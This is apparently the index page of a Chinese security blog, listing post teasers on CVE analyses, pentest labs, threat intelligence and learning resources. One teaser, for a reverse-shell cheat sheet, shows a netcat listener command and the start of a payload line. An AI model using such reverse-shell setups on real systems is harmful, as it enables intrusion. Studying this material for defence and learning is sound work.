女朋友被恶魔游戏 “咩了个咩” 破防胁持人身自由,为了解救她,作者用魔法打败魔法,记录与恶魔游戏的对抗过程,抛砖引玉讲述了中间人攻击的实际应用 —— 网络安全任重而道远,要引以为鉴
2022-09-18
CVE-2021-22192 漏洞分析
GitLab 是一款使用 Rails 开发的、自托管的、Git 项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。 GitLab all versions starting from 13.2 存在安全漏洞,该漏洞允许未经授权的经过身份验证的用户在服务器上执行任意代码。
2021-05-02
CVE-2019-5475 与 CVE-2019-15588 漏洞分析
Nexus 2.x RCE 命令注入漏洞:Nexus 是 Sonatype 公司推出的一个强大的仓库管理器,提供了 maven、nuget、docker、npm、bower、pypi、rubygems、git lfs、yum、go、apt 等私有仓库的管理能力
2020-12-20
CVE-2020-13277 漏洞分析
An authorization issue in the mirroring logic allowed read access to private repositories in GitLab CE/EE 10.6 and later through 13.0.5
2020-11-09
供应商是如何一层一层一层地拿下项目经理的
0x10 前言本文引用的案例都是切实发生过的,主要以国内供应商居多,国外代理商也有类似情况,但是相对会少。
他们最终的目标就是通过非正常途径中标,只要未签合同你就是爸爸,但是签了合同什么都不好说,甚至还可能把公司很多信息都套走。
另外,以下
2020-09-18
CVE-2020-13933 漏洞分析
Apache Shiro < 1.6.0 身份验证绕过漏洞: Apache Shiro 是一个强大且易用的 Java 安全框架,执行身份验证、授权、密码和会话管理,通常会和 spring 等框架一起搭配使用来开发 web 应用
2020-09-09
各种语言的一句话反弹 shell 命令
攻击主机先监听端口最简单的脚本可以用 nc :
nc -lvvp 9527
被攻击主机连接到服务端口一般都需要通过 RCE、 webshell 等方式在被攻击机执行以下命令,具体怎么做就要看水平了:
JAVARuntime.getRunti
2020-08-17
威胁情报播报
从 360、奇安信、红后、绿盟、安全客、斗象 等公开来源爬取并整合最新的威胁情报信息,并实时推送到 邮箱、订阅号、QQ 群
2020-05-01
WEB 渗透靶场整合
DVWA推荐新手首选靶场,配置简单,需下载 phpstudy 和靶场文件包,简单部署之后即可访问。
包含了常见的web漏洞(php的),每个漏洞分为四个等级,每个等级都有源码查看,最高等级的源码是最安全的。
DVWA靶场源码下载:http
2019-10-22
白帽子渗透测试入门资源:参考书、课程、工具、认证
前言初入渗透测试领域,过程中遇到不少错综复杂的知识,也遇到不少坑,特此记录,慢慢整理慢慢填。
名词解析
名词
全称
解析
PwK
Penetration Testing with Kali Linux
Kali-Linux 渗透测
2018-12-16